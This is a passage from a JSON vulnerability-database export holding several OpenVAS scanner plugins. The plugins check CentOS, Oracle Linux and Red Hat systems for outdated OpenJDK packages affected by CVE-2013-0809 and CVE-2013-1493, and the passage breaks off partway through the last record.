centos6 ", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-0809", "CVE-2013-1493"], "modified": "2018-01-26T00:00:00", "id": "OPENVAS:881655", "href": "http://plugins.openvas.org/nasl.php?oid=881655", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for java CESA-2013:0602 centos6 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"These packages provide the OpenJDK 7 Java Runtime Environment and the\n OpenJDK 7 Software Development Kit.\n\n An integer overflow flaw was found in the way the 2D component handled\n certain sample model instances. A specially-crafted sample model instance\n could cause Java Virtual Machine memory corruption and, possibly, lead to\n arbitrary code execution with virtual machine privileges. (CVE-2013-0809)\n \n It was discovered that the 2D component did not properly reject certain\n malformed images. Specially-crafted raster parameters could cause Java\n Virtual Machine memory corruption and, possibly, lead to arbitrary code\n execution with virtual machine privileges. (CVE-2013-1493)\n \n Note: If the web browser plug-in provided by the icedtea-web package was\n installed, the issues exposed via Java applets could have been exploited\n without user interaction if a user visited a malicious website.\n \n This erratum also upgrades the OpenJDK package to IcedTea7 2.3.8. Refer to\n the NEWS file, linked to in the References, for further information.\n \n All users of java-1.7.0-openjdk are advised to upgrade to these updated\n packages, which resolve these issues. All running instances of OpenJDK Java\n must be restarted for the update to take effect.\";\n\n\ntag_affected = \"java on CentOS 6\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2013-March/019624.html\");\n script_id(881655);\n script_version(\"$Revision: 8542 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-26 07:57:28 +0100 (Fri, 26 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-12 10:00:36 +0530 (Tue, 12 Mar 2013)\");\n script_cve_id(\"CVE-2013-0809\", \"CVE-2013-1493\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2013:0602\");\n script_name(\"CentOS Update for java CESA-2013:0602 centos6 \");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of java\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk\", rpm:\"java-1.7.0-openjdk~1.7.0.9~2.3.8.0.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-demo\", rpm:\"java-1.7.0-openjdk-demo~1.7.0.9~2.3.8.0.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-devel\", rpm:\"java-1.7.0-openjdk-devel~1.7.0.9~2.3.8.0.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-javadoc\", rpm:\"java-1.7.0-openjdk-javadoc~1.7.0.9~2.3.8.0.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-src\", rpm:\"java-1.7.0-openjdk-src~1.7.0.9~2.3.8.0.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:35:54", "description": "Oracle Linux Local Security Checks ELSA-2013-0602", "cvss3": {}, "published": "2015-10-06T00:00:00", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2013-0602", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-0809", "CVE-2013-1493"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310123679", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123679", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2013-0602.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123679\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:07:08 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2013-0602\");\n script_tag(name:\"insight\", value:\"ELSA-2013-0602 - java-1.7.0-openjdk security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2013-0602\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2013-0602.html\");\n script_cve_id(\"CVE-2013-0809\", \"CVE-2013-1493\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux6\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk\", rpm:\"java-1.7.0-openjdk~1.7.0.9~2.3.8.0.0.1.el6_4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-demo\", rpm:\"java-1.7.0-openjdk-demo~1.7.0.9~2.3.8.0.0.1.el6_4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-devel\", rpm:\"java-1.7.0-openjdk-devel~1.7.0.9~2.3.8.0.0.1.el6_4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-javadoc\", rpm:\"java-1.7.0-openjdk-javadoc~1.7.0.9~2.3.8.0.0.1.el6_4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-src\", rpm:\"java-1.7.0-openjdk-src~1.7.0.9~2.3.8.0.0.1.el6_4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-24T11:10:09", "description": "Check for the Version of java", "cvss3": {}, "published": "2013-03-12T00:00:00", "type": "openvas", "title": "CentOS Update for java CESA-2013:0605 centos6 ", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-0809", "CVE-2013-1493"], "modified": "2018-01-24T00:00:00", "id": "OPENVAS:881649", "href": "http://plugins.openvas.org/nasl.php?oid=881649", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for java CESA-2013:0605 centos6 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"These packages provide the OpenJDK 6 Java Runtime Environment and the\n OpenJDK 6 Software Development Kit.\n\n An integer overflow flaw was found in the way the 2D component handled\n certain sample model instances. A specially-crafted sample model instance\n could cause Java Virtual Machine memory corruption and, possibly, lead to\n arbitrary code execution with virtual machine privileges. (CVE-2013-0809)\n \n It was discovered that the 2D component did not properly reject certain\n malformed images. Specially-crafted raster parameters could cause Java\n Virtual Machine memory corruption and, possibly, lead to arbitrary code\n execution with virtual machine privileges. (CVE-2013-1493)\n \n Note: If your system has not yet been upgraded to Red Hat Enterprise Linux\n 6.4 and the web browser plug-in provided by the icedtea-web package was\n installed, the issues exposed via Java applets could have been exploited\n without user interaction if a user visited a malicious website. Thus, this\n update has been rated as having critical security impact as a one time\n exception. The icedtea-web package as provided with Red Hat Enterprise\n Linux 6.4 uses OpenJDK 7 instead.\n \n This erratum also upgrades the OpenJDK package to IcedTea6 1.11.9. Refer to\n the NEWS file, linked to in the References, for further information.\n \n All users of java-1.6.0-openjdk are advised to upgrade to these updated\n packages, which resolve these issues. All running instances of OpenJDK Java\n must be restarted for the update to take effect.\";\n\n\ntag_affected = \"java on CentOS 6\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2013-March/019623.html\");\n script_id(881649);\n script_version(\"$Revision: 8509 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-24 07:57:46 +0100 (Wed, 24 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-12 09:59:46 +0530 (Tue, 12 Mar 2013)\");\n script_cve_id(\"CVE-2013-0809\", \"CVE-2013-1493\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2013:0605\");\n script_name(\"CentOS Update for java CESA-2013:0605 centos6 \");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of java\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk\", rpm:\"java-1.6.0-openjdk~1.6.0.0~1.57.1.11.9.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-demo\", rpm:\"java-1.6.0-openjdk-demo~1.6.0.0~1.57.1.11.9.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-devel\", rpm:\"java-1.6.0-openjdk-devel~1.6.0.0~1.57.1.11.9.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-javadoc\", rpm:\"java-1.6.0-openjdk-javadoc~1.6.0.0~1.57.1.11.9.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-src\", rpm:\"java-1.6.0-openjdk-src~1.6.0.0~1.57.1.11.9.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-22T13:09:49", "description": "Check for the Version of java", "cvss3": {}, "published": "2013-03-08T00:00:00", "type": "openvas", "title": "CentOS Update for java CESA-2013:0603 centos5 ", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-0809", "CVE-2013-1493"], "modified": "2018-01-22T00:00:00", "id": "OPENVAS:881623", "href": "http://plugins.openvas.org/nasl.php?oid=881623", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for java CESA-2013:0603 centos5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"These packages provide the OpenJDK 7 Java Runtime Environment and the\n OpenJDK 7 Software Development Kit.\n\n An integer overflow flaw was found in the way the 2D component handled\n certain sample model instances. A specially-crafted sample model instance\n could cause Java Virtual Machine memory corruption and, possibly, lead to\n arbitrary code execution with virtual machine privileges. (CVE-2013-0809)\n\n It was discovered that the 2D component did not properly reject certain\n malformed images. Specially-crafted raster parameters could cause Java\n Virtual Machine memory corruption and, possibly, lead to arbitrary code\n execution with virtual machine privileges. (CVE-2013-1493)\n\n This erratum also upgrades the OpenJDK package to IcedTea7 2.3.8. Refer to\n the NEWS file, linked to in the References, for further information.\n\n All users of java-1.7.0-openjdk are advised to upgrade to these updated\n packages, which resolve these issues. All running instances of OpenJDK Java\n must be restarted for the update to take effect.\";\n\n\ntag_affected = \"java on CentOS 5\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2013-March/019268.html\");\n script_id(881623);\n script_version(\"$Revision: 8483 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-22 07:58:04 +0100 (Mon, 22 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-08 10:20:03 +0530 (Fri, 08 Mar 2013)\");\n script_cve_id(\"CVE-2013-0809\", \"CVE-2013-1493\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2013:0603\");\n script_name(\"CentOS Update for java CESA-2013:0603 centos5 \");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of java\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk\", rpm:\"java-1.7.0-openjdk~1.7.0.9~2.3.8.0.el5_9\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-demo\", rpm:\"java-1.7.0-openjdk-demo~1.7.0.9~2.3.8.0.el5_9\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-devel\", rpm:\"java-1.7.0-openjdk-devel~1.7.0.9~2.3.8.0.el5_9\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-javadoc\", rpm:\"java-1.7.0-openjdk-javadoc~1.7.0.9~2.3.8.0.el5_9\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-src\", rpm:\"java-1.7.0-openjdk-src~1.7.0.9~2.3.8.0.el5_9\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-27T10:51:24", "description": "Check for the Version of java-1.7.0-openjdk", "cvss3": {}, "published": "2013-03-08T00:00:00", "type": "openvas", "title": "RedHat Update for java-1.7.0-openjdk RHSA-2013:0602-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-0809", "CVE-2013-1493"], "modified": "2017-07-12T00:00:00", "id": "OPENVAS:870949", "href": "http://plugins.openvas.org/nasl.php?oid=870949", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for java-1.7.0-openjdk RHSA-2013:0602-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"These packages provide the OpenJDK 7 Java Runtime Environment and the\n OpenJDK 7 Software Development Kit.\n\n An integer overflow flaw was found in the way the 2D component handled\n certain sample model instances. A specially-crafted sample model instance\n could cause Java Virtual Machine memory corruption and, possibly, lead to\n arbitrary code execution with virtual machine privileges. (CVE-2013-0809)\n\n It was discovered that the 2D component did not properly reject certain\n malformed images. Specially-crafted raster parameters could cause Java\n Virtual Machine memory corruption and, possibly, lead to arbitrary code\n execution with virtual machine privileges. (CVE-2013-1493)\n\n Note: If the web browser plug-in provided by the icedtea-web package was\n installed, the issues exposed via Java applets could have been exploited\n without user interaction if a user visited a malicious website.\n\n This erratum also upgrades the OpenJDK package to IcedTea7 2.3.8. Refer to\n the NEWS file, linked to in the References, for further information.\n\n All users of java-1.7.0-openjdk are advised to upgrade to these updated\n packages, which resolve these issues. All running instances of OpenJDK Java\n must be restarted for the update to take effect.\";\n\n\ntag_affected = \"java-1.7.0-openjdk on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2013-March/msg00016.html\");\n script_id(870949);\n script_version(\"$Revision: 6687 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:46:43 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-08 10:17:57 +0530 (Fri, 08 Mar 2013)\");\n script_cve_id(\"CVE-2013-0809\", \"CVE-2013-1493\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"RHSA\", value: \"2013:0602-01\");\n script_name(\"RedHat Update for java-1.7.0-openjdk RHSA-2013:0602-01\");\n\n script_summary(\"Check for the Version of java-1.7.0-openjdk\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk\", rpm:\"java-1.7.0-openjdk~1.7.0.9~2.3.8.0.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-debuginfo\", rpm:\"java-1.7.0-openjdk-debuginfo~1.7.0.9~2.3.8.0.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-devel\", rpm:\"java-1.7.0-openjdk-devel~1.7.0.9~2.3.8.0.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-22T13:09:57", "description": "Check for the Version of java-1.6.0-openjdk", "cvss3": {}, "published": "2013-03-08T00:00:00", "type": "openvas", "title": "RedHat Update for java-1.6.0-openjdk RHSA-2013:0604-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-0809", "CVE-2013-1493"], "modified": "2018-01-22T00:00:00", "id": "OPENVAS:870950", "href": "http://plugins.openvas.org/nasl.php?oid=870950", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for java-1.6.0-openjdk RHSA-2013:0604-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"These packages provide the OpenJDK 6 Java Runtime Environment and the\n OpenJDK 6 Software Development Kit.\n\n An integer overflow flaw was found in the way the 2D component handled\n certain sample model instances. A specially-crafted sample model instance\n could cause Java Virtual Machine memory corruption and, possibly, lead to\n arbitrary code execution with virtual machine privileges. (CVE-2013-0809)\n\n It was discovered that the 2D component did not properly reject certain\n malformed images. Specially-crafted raster parameters could cause Java\n Virtual Machine memory corruption and, possibly, lead to arbitrary code\n execution with virtual machine privileges. (CVE-2013-1493)\n\n This erratum also upgrades the OpenJDK package to IcedTea6 1.11.9. Refer to\n the NEWS file, linked to in the References, for further information.\n\n All users of java-1.6.0-openjdk are advised to upgrade to these updated\n packages, which resolve these issues. All running instances of OpenJDK Java\n must be restarted for the update to take effect.\";\n\n\ntag_affected = \"java-1.6.0-openjdk on Red Hat Enterprise Linux (v. 5 server)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2013-March/msg00018.html\");\n script_id(870950);\n script_version(\"$Revision: 8483 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-22 07:58:04 +0100 (Mon, 22 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-08 10:18:11 +0530 (Fri, 08 Mar 2013)\");\n script_cve_id(\"CVE-2013-0809\", \"CVE-2013-1493\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"RHSA\", value: \"2013:0604-01\");\n script_name(\"RedHat Update for java-1.6.0-openjdk RHSA-2013:0604-01\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of java-1.6.0-openjdk\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk\", rpm:\"java-1.6.0-openjdk~1.6.0.0~1.36.1.11.9.el5_9\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-debuginfo\", rpm:\"java-1.6.0-openjdk-debuginfo~1.6.0.0~1.36.1.11.9.el5_9\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-demo\", rpm:\"java-1.6.0-openjdk-demo~1.6.0.0~1.36.1.11.9.el5_9\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 